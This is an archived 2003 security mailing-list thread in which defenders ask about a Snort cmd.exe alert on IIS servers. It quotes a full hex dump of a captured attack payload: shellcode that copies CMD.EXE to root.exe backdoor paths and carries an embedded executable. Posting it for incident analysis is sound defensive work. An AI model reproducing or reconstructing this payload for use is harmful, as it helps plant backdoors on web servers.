We saw the exact same packets attack our network from 3 different hosts. It appears that somehow this attack successfully breached a "hardened" IIS box. URLScan reported several typical Code Red type traffic from the attacking IPs, and although the IIS log was scrubbed of some suspicious activity, our syslogs and IDS indicated that the attack was successful. Any info on these attack packets would be greatly appreciated. Regards. Shane =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Shane MacDougall Lead Security Officer ID Analytics San Diego, California USA Direct: (858) 427-2860 Toll Free: 866-240-4484 x 2860 Fax: 858-427-2899 -----Original Message----- From: Q [mailto:quentyn@the-q.co.uk] Sent: Thursday, May 29, 2003 12:10 PM To: incidentsat_private Subject: strange cmd.exe access Hi I saw this packet #(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access IPv4: 194.204.X.X -> X.X.X.X hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116 chksum=60435 TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841 ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151 Payload: length = 1432 000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl 010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u. 020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close 030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E. 040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u. 050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri 060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E..... 070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U.. 080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem 090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E... 0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U 0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket. 0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl 0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U. 0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc 0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E.... 100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U. 110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select.. 120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen 130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E...... 140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E... 150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname.. 160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get 170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U 180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL 190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U.. 1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL 1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi 1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U 1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@. 1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........ 1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t..... 200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................ 210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................ 220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... .......... 230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................ 240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#.. 250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t... 260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h... 270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\. 280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE. 290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d: 2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts 2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$... 2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+... 2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm 2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD 2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$.. 300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U....... 310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP............. 320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@....... 330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L.... 340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%)............. 350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................ 360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@.. 370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................ 380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@....... 390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ... 3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0....... 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................ 3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`...... 400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@. 420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0 430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@......... 450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @. 490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @. 4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L... 4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1.... 4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h. 4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u& 4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @. 4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@ 500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?... 510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........ 520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L.... 530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @. 540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@.. 550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h 560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@....... 570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@ 580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h 590 : D4 24 40 00 6A 00 55 FF .$@.j.U. what is strange is that the cmd.exe / root.exe stuff is half way through with some other code before it the ip it hit was not mapped to anything ( I believe it is unused) so this can not have been part of another tcp converstion any ideas ? -- The should be a sig here, but it got bored and wandered off ------------------------------------------------------------------------ ---- ------------------------------------------------------------------------ ---- ---------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Jun 05 2003 - 08:51:34 PDT